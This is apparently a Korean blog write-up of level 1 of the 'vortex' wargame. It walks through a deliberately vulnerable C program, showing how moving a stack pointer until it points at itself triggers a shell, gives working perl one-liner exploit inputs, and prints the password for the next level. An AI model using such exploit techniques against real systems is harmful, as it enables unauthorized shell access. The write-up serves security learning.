vortex level1
엉뚱하게 깊이 들어가서 상당히 헤멨다.
main함수에서 선언한 두 buf 와 ptr이 스택에 생성된 모습을 그려보면 쉽게 포인트를 잡을 수 있다.
unsigned char buf[512];
unsigned char *ptr = buf + (sizeof(buf)/2);
unsigned int x;
스택에 쌓인 모습은 대충 이런식일 것이다.
--------------- High addresss
ret
---------------
ebp
---------------
buf
---------------
ptr
---------------
x
--------------- Low address
ptr은 buf 의 주소 + 256 의 위치를 가르키고 있는데
case '\\': ptr--; break; 이 구문에 의해 ptr의 값을 낮출 수가 있다.
스택은 높은주소에서 낮은 주소로 자라기 떄문에 ptr의 값을 계속 낮추다 보면
buf의 영역을 넘어서 ptr을 자신을 가리키게 된다.
그 상태에서 아무 값이나 입력하면
default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;
요기에 걸려서 ptr이 포인팅하는 곳, 즉 ptr의 주소에 입력한 값을 넣게 된다.
매크로 함수 e() 를 보자.
#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }
ptr과 0xff000000을 AND 연산해서 0xca000000과 같으면 { } 안의 구문을 실행 시켜 쉘을 획득하게 된다. 0xff는 11111111이므로 AND 연산해서 0xca가 나오는 것은 0xca 자신 뿐이다. ptr은 buf + 256 의 주소값을 가지고 있어서 -257을 하면 ptr 자신을 가리킬 것이다. 처음엔 이렇게 시도를 해보았다. perl -e 'print "\\"x257,"\xca"'|./level1 그냥 All done 출력하고 끝이난다. 흠.. 기대한 결과가 나오질 않았다. 이상하다 싶어서 코드를 조금 수정해서 로컬에서 주소값을 찍어보았다.
주소값은 4바이트에 Little endian 이므로 16진수 형태로 CA 를 넣게되면 ptr 주소의 첫 1바이트를 바꿀 수 있어서 쉘을 얻을 수 있을 것이다.
원하는대로 주소가 ca로 시작하는 것을 볼 수 있다. 값을 더 입력해보면..
perl -e 'print "\\"x257,"\xca","\xca"'|./level1
오.. 쉘이 실행되는 것을 볼 수 있다. 왜 이런 현상이 생길까 곰곰히 생각해 보았다.
사실 문제를 풀때 코드를 자세하게 보지 않는 짓을 자주 저지른다. 이번에도 마찬가지였다.
default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;
default 구문에서 먼저 실행되고 나서 ptr에 x 를 집어 넣는다. 따라서 "\xca"를 입력하면 ptr의 값에
들어가게 되고, 한번 더 입력하면 다시 default 문에 걸려서 e() function이 실행된다. 으.. 삽질을..
그런데 막상 타겟 서버에서 이렇게 입력하니 shell 이 잠시 떨어졌다가 바로 종료된다.
문제가 무엇일까 생각하다 You may need to consider how bash handles EOF.. 라는
힌트에 주목했다. 표준 출력을 파이프를 통해 입력으로 넘길때 EOF가 같이 넘어가서 바로
종료되는 듯 했다.
(perl -e 'print "\\"x257,"\xca","\xca"';cat)|./level1
따라서 표준 입력으로 집어넣을때 cat을 이용해서 종료되지 않도록 실행해 보았더니 쉘이
떨어졌다!! README에 적힌대로 /etc/vortex_pass/vortex2 를 읽으면 23anbT\rE 라고
적힌 패스워드를 확인할 수 있다.
'War game > vortex' 카테고리의 다른 글
vortex12 (0) | 2014.01.02 |
---|---|
Vortex11 (3) | 2013.04.02 |
vortex level10 (0) | 2011.04.18 |
vortex level8 (0) | 2010.12.09 |
vortex level3 (0) | 2009.10.03 |
vortex level0 (0) | 2009.09.23 |